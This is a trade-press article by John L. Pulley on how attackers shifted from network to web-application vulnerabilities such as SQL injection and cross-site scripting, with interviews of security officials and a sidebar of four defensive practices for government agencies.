Weak spots in the fortress

Vulnerabilities in Web-based software put agencies and citizens at risk.

In what now seems like a more innocent era, attacks against computer networks a decade ago had names like smurf and teardrop. Hackers then typically targeted operating systems, Internet and e-mail servers, firewalls, and other vulnerable network components. Upstart hackers known as script kiddies were motivated by the challenge of taking down a network and earning a measure of notoriety.Information technology security professionals responded by bolstering firewalls, reconfiguring and scanning networks, and stiffening perimeter defenses. The measures impeded the rash of computer worms that burrowed into networks and relied on unrestricted connectivity to spread.“Most of the spending [on security] was at the network level,” said Mike Weider, chief technology officer at Watchfire, a Web application security company. “The mentality was on perimeter defense…to build the walls of the castle high.”Realizing that hardened networks were increasingly difficult to breach using head-on attacks, hackers switched tactics. They turned their attention to finding application-level vulnerabilities. Bugs that reside in programs running on PCs and Web-based applications are as insidious as termites in a wood-frame house. When exploited, they do their damage from the inside out.“The Internet came along, and applications that were on the inside [of an organization], we put them outside” via the Web, Weider said. “Hackers discovered that you could exploit vulnerabilities in the software applications that were put outside the walls and…steal data, perform fraud, deface Web sites or cause other malicious acts.”Today, application-level attacks outpace attacks on networks by 3-to-1, according to industry sources. Even as organizations have fortified network security, the threat from application vulnerabilities has expanded.“This problem has been steadily growing over the last 10 years and has reached a feverish pitch,” Weider said. “We’ve seen a huge shift in attack focus.”The objective of hackers has also changed. “They are no longer just trying to get attention,” said James MacDougall, South Carolina’s chief information security officer. He said he has seen huge numbers of application-level attacks that seek to steal data or take over computers.“What they want is personal identifiable information,” he said. “They want credit cards. They want to make money.”In a recent attack that affected a nine-state area, including South Carolina, hijacked computers were used to create a botnet — an illegal network that can be used for nefarious purposes, such as generating spam on behalf of paying customers.“It’s almost like a service-level agreement,” MacDougall said of the financial arrangements struck between illegal spammers and their clients.As governments at the federal, state and local levels expand their Web presence, the vulnerability of public-sector IT will also grow, experts predict.“The DMV and benefits departments and Medicare are starting to put more applications online,” said Brian Laing, chief security officer at RedSeal Systems, a provider of security risk management solutions.Most organizations, including government agencies, have been slow to recognize and respond to the changing threat, security experts say. “Network security has been around for eight or nine years now,” said Mandeep Khera, vice president of marketing at Cenzic, which sells application security risk management products. “Most organizations have spent a lot of money on securing the network.”That is no longer enough. You have to have network security and applications security in place to keep up with current threats, Khera said. People charged with keeping systems and data safe “have to get over the fiction that network security will protect them from all threats. Application security is a different animal.”Russian hackers breached the security of a Web site managed by the state of Rhode Island in January 2006. The thieves boasted in an online forum of having stolen credit card data for about 53,000 transactions, the Providence Journal newspaper reported. State officials did not divulge how the hackers were able to access the confidential data.However, the hackers almost certainly used a strategy that is well-known to security pros. Cross-site scripting and SQL injection are two of the most prominent techniques for exploiting application-level vulnerabilities.Cross-site scripting allows hackers to inject code into Web pages viewed by other users, such as comments posted on public discussion boards, or exploit vulnerabilities in the way Web sites exchange data with visitors’ browsers.Such ploys often involve the hackers masquerading as trustworthy online entities to send e-mail and instant messages. The messages dupe victims into visiting phony sites that look authentic and thereby trick them into giving sensitive personal or financial information.SQL injection exploits vulnerabilities in the database layer of applications. Using nothing more than a Web browser, hackers look for gaps in software security that let them trick an application into retrieving and divulging information that shouldn’t be released from its database.The vulnerability is often a poorly secured interface, such as a user log-in page. Instead of entering valid log-in information, such as a name and password, the hacker injects a string of Structured Query Language, a protocol computers use to communicate with relational databases.On pages with poorly written code, a hacker “can craft stuff on those fields to have you give up all the secrets on your database,” MacDougall said. “I can go through and steal everything you’ve got.”The practice has become so well-known that people can easily find software utilities that automate SQL injection attacks. A simple Google search using “.gov” and common error messages that indicate software vulnerabilities will return thousands of hits, MacDougall said.The rapid expansion of government Web sites has increased the likelihood of hackers breaching security, experts say. Another cause for concern is the government’s preference for customized software, which tends to be much more vulnerable to attacks than commercial applications. Microsoft and other large vendors of commercial applications routinely issue patches to fix known vulnerabilities. Users of customized applications are often on their own.Custom-developed, Web-based applications tend to be several orders of magnitude less secure than commercially developed programs, said Gunter Ollmann, director of security strategy at IBM’s Internet Security Systems (ISS) division.“When ISS’ professional services consulting team looks at upcoming commercial products, a typical report may identify 20 to 30 vulnerabilities, of which, on average, two to five would be high-risk or critical,” Ollmann said. “Looking at applications developed internally, which may be deployed on thousands of desktops or servers, the report is 20 or 30 pages long, with 100-plus high-risk security vulnerabilities.”Web applications, which can share and replicate components, are inherently more vulnerable to attack. In addition, the software developers who create custom Web applications tend not to put a premium on security.“The two things we ask developers to do is cool functionality and get the application out the door on time,” said Michael Sutton, security evangelist at SPI Dynamics. “Those two things often work in opposition to security.”Developers’ inattention to security also raises the possibility of programmers intentionally creating hidden vulnerabilities, including backdoors that allow unauthorized access to programs.“There is so much [application development] outsourcing to India and China and other countries. Anyone can put backdoors in there,” Khera said. “If you don’t do thorough testing for backdoors and other security testing, you have no idea what might be in there. You just don’t know what’s in the code.”






























Most common ploys
















Added risks of custom software














Pulley is a freelance writer based in Arlington, Va.

4 defenses against application attacks
Agencies can take steps to limit their vulnerability to application-level attacks. The first step is to ignore Britney Spears.
In April, hackers lured unsuspecting users to sites that exploited a vulnerability in .ani files that Microsoft operating systems use to read and store animated cursors. Taking advantage of the vulnerability, the bogus sites injected hostile code into visitors’ computers that allowed hackers to take control of machines.
The enticement? Spam e-mail messages promising nude photos of the troubled pop star.
You can never make yourself impervious to application-level attacks because many vulnerabilities have yet to be discovered. However, focusing on user education and technology solutions can lessen the chances of being victimized by such an attack.
As noted above, hackers often succeed in breaching security with the assistance of unwitting victims.
“Some of these attacks require the collaboration of users,” said Max Caceres, director of product management at Core Security Technologies. “In the Britney Spears attack, somebody needs to click on that” link.
Here are four ways to avoid application-level attacks:
  • Offer security awareness training. Teach employees to identify attacks and not fall for them, Caceres said. Core Impact, the company’s network security product, can test the likelihood that employees will be duped by hackers’ tricks, he said.
  • Remove unused applications. It is good policy to remove unnecessary applications from users’ machines, Caceres said. An attack that exploits a vulnerability in QuickTime, for example, is not a threat if you’re not running that application.
  • Patch high-risk software vulnerabilities. As a matter of course, security administrators should find and patch high-risk vulnerabilities in commercial applications. Scans and penetration tests can identify and determine the risk level of many of them. A word of caution: Software patches can be buggy, too. The Britney Spears attack exploited a vulnerability in a patch issued to correct a previously identified problem.
  • Teach your developers to write secure code. Custom applications tend to have more vulnerabilities than commercial products. Microsoft won’t help you debug programs you’ve created in-house.
“If you create a vulnerability, you are totally on your own,” said Michael Sutton, security evangelist at SPI Dynamics, which focuses on Web application security. That company, along with Watchfire and others, is part of an emerging market built around identifying new vulnerabilities on custom Web applications, Caceres said. 
The bottom line is that organizations are responsible for securing their systems and the data they hold, said James MacDougall, South Carolina’s chief information security officer. His staff developers undergo off-site training that teaches them to write secure code. MacDougall regularly visits with contract developers to ensure security, and he tests applications for security vulnerabilities well before they go into production.
“Even if an outside vendor does the application, we are the steward of the information,” MacDougall said. “It is our responsibility. If there is ever a lawsuit, South Carolina would be a co-litigant.”
— John L. Pulley